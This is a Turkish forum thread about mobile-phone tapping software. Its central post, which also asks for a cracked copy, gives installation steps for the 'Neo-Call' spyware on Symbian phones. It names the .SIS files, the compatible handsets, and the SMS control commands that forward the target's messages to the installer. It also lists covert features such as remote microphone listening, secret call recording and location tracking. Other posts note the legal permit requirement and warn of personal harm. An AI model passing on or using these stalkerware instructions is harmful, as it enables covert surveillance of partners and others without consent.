Jump to content

Cep Telefonu Dinleme Programı Hak. Bilgisi Olan

maxi_cex
 Share

Recommended Posts

Var olmasına da işine yarar mı o mesele. Çünkü karşı telefonu dinlemen için orda da aynı programın yüklü olması lazım. Genelde Symbian telefonlarda uygulanıyor bu sistem ama ne kadar doğru tartışılır.

arkadaşlar bildiğim kadarı ile herhangi bir programa ihtiyaç duymadan direkt olarak şebekeden dinlenedilitor fakat bunun için şirketler var ve bu şirketlerden de bunları temin edip bu hizmetten yararlanabilmek içinde savcılıktan özel izin belgesi alınması gerekiyor yani her önüne gelen her istediğini dinleyemiyor eğer illegal bir yöntemle dinleme varsa onu bilmiyorum

arkadaşlar bildiğim kadarı ile herhangi bir programa ihtiyaç duymadan direkt olarak şebekeden dinlenedilitor fakat bunun için şirketler var ve bu şirketlerden de bunları temin edip bu hizmetten yararlanabilmek içinde savcılıktan özel izin belgesi alınması gerekiyor yani her önüne gelen her istediğini dinleyemiyor eğer illegal bir yöntemle dinleme varsa onu bilmiyorum

yasak abı dınleme ernkonun soruşturması varya kımseye vermez bakalım daha neler çıkacak

Var olmasına da işine yarar mı o mesele. Çünkü karşı telefonu dinlemen için orda da aynı programın yüklü olması lazım. Genelde Symbian telefonlarda uygulanıyor bu sistem ama ne kadar doğru tartışılır.

Varsa upload edermisin Securty Gerisini bana bırak yeter.Karşı telefona kurmak çok basit.....

arkadaşlar interneti araştırdığınız zaman programları gösteriyor ve fiyatlarını da ama pahalı 600 YTL - 1100 YTL gibi rakamlar çıkıyor programın çalışması (Casus telefon ortam dinleme yazılımı yüklenmiş casus cep telefonunu, kendi telefonunuzdan aradığınızda , hedef telefon çalmaz ,titreşim yapmaz ,ışığı yanmaz ve sadece mikrofonu açar , böylece hedef kişi arabadayken, yürürken ,toplantıdayken veya bir restorandayken ,yanındakilerle ne konuştuğunu dinlemiş olursunuz) ama bana kırık lazım olan varsa.....

Casus Dinleme Programı TRİAL Versiyon

Neo-CONTROL İndir

PROGRAMIN KULLANIMI...

### Neo-Call TRIAL Application (.SIS files) for s60fp1 and S60fp2 [symbian OS7/8] ###

--- Neo-DENEME SÜRÜMÜ (2 hours) ---

*** BU DENEME SÜRÜMÜNDE BULUNANLAR Neo-SMS Neo-LIST Neo-TRAX Neo-LOG Neo-PHONE² Neo-INTERCEPTOR Neo-CONTROL Neo-RECORD

fp1demo.sis dosyasını aşağıdaki UYUMLU telefonlardan herhangi birine transfer edip yükleyiniz.(dosya adını değiştirmeyiniz !) aşağıdaki telefonlardan herhangi birine sahipseniz: fp1demo.sis

dosyasını yükleyiniz.

Nokia 3230 Nokia 6670 Nokia 6260 Nokia 7610

Nokia 6620 Nokia 6600 Panasonic X700 Samsung SGH - D720

EĞER TELEFONUNUZ AŞAĞIDAKİLERDEN BİRİYSE: fp2 demo.sis DOSYASINI YÜKLEMELİSİNİZ.

Transfer and Install fp2demo.sis (do not rename the FILENAME !) if you have any of the following phones:

Lenovo P930 Nokia N72 Nokia N70 Nokia N90 Nokia 6682

Nokia 6681 Nokia 6680 Nokia 3230 Nokia 6670 Nokia 6630

Nokia 6260 Nokia 7610 Nokia 6620 Nokia 6600 Panasonic X800

Panasonic X700 Samsung SGH-Z600 Samsung SGH - D720

Samsung SGH-D730

Yükleme sırasında'' telefonamı ypksa hafıza kartınamı yüklensin''sorusu çıkabilir bu durumda kesinlikle TELEFON hafızası seçilmelidir.

Yükelme tamamlandıktan sonra 2 dakika sonra program çalışmaya başlar.Telefonu kapatıp açmanıza gerek yoktur (isterseniz kapatıp açabilirsinizr !)Yapılandırmada ilk adım olarak numara tanımla(dinleme yapacağınız numara)gerçekleştirilmelidir.

B adım için yapmanız gereken kendi telefonunuzdan programı yüklediğiniz telefona aşağıda görünen formatta bir sms göndermek olacaktır;

#1234#<sms>+90532???0000(telefon numarası kendi telefon numaranız olacak)

Bu komutın amacı yukarıda tanımladığınız numaranıza SMS mesajlarının birer kopyasını yönlendirmektir.

Bu komutu gönderdikten sonra aşağıdaki komutuda SMS olarak karşı telefona gönderip yapılandırma raporu alabilrsiniz

#1234#603

Eğer fll Yapabilirseniz çok harika bir program.

Ben daha denemedim deneyen varsa buraya bekliyoruz...

NEOCALL programının özellikleri

1- Telefonnun mikrofonunu kullanarak mesafe sınırı olmadan ortam dineleyebileme

2- Telefon görüşmelerini dinleyebilme

3- Hedef telefona gelen ve giden tüm sms lerin birer kopyasını size yönlendirme

4- Telefonda yaptığı tüm görüşmeleri gizlice kaydetme

5- Telefonun bulunduğu yeri tespit edebilme

6- Telefondaki arama kayıtlarını sms raporu olarak liste halinde alabilme

7- Telefon çalındığında çalanları hemen bulabilme

8- Yukarıdaki tüm özellikleri telefonda gizli bir dosyaya kaydedip daha sonra kendi telefonunuza aktarabilme (yeni)

9- Simkart değiştirildiğinde yeni takılan sim kartın numarası size hemen. sms olarak gelir

10- Hedef telefona bir gizli sms komutu gönderin gizlice sizi arasın ve ortamı dinleyin

YÜKLEME SEÇENEKLERİ:

A) Bluetooth

:) Hafıza kartı

C) Gprs

D) Wap

E) Kablo

F) Kızılötesi

KAYNAK:

Please register to see this content.

Edited by register

arkadaşım ben denenedim ama bi türlü olmadı.. programı sony ericson w-580i ye kurdum dinlemek istediğim no yu girdim işte ondan sonrası olmuyor.. biraz daha açıklarsan sevinirim :)

• 2 years yıl...

bence hiç bulaşmayın arkadaşlar telefon dinlemeye...ben bir bulaştım hayatım kaydı üstüne üstlük ..k gibi para saydım...aklınızda şüphe varsa alın karşınıza konuşun anlaşın bir şekilde, evliyseniz en fazla ayrılırsınız ama başka bir hayat kuraraken kafanızda sürekli dönüp duran ve sizi rahatsız eden sesler olmaz sırf ben bu yüzden psikolojik tedavi gördüm ilişkinizi bitirseniz bile dinleme yaparken duyduğunuz sesler veya konuşmalar sürekli kafanızın içinde sizi rahatsız ediyor karşı cinsten tiksiniyor hayatı çok çarpık pislik ve anlamsız görüyorsunuz ve yani bir hayata başlayamıyorsunuz sürekli reset atıp duruyor beyniniz.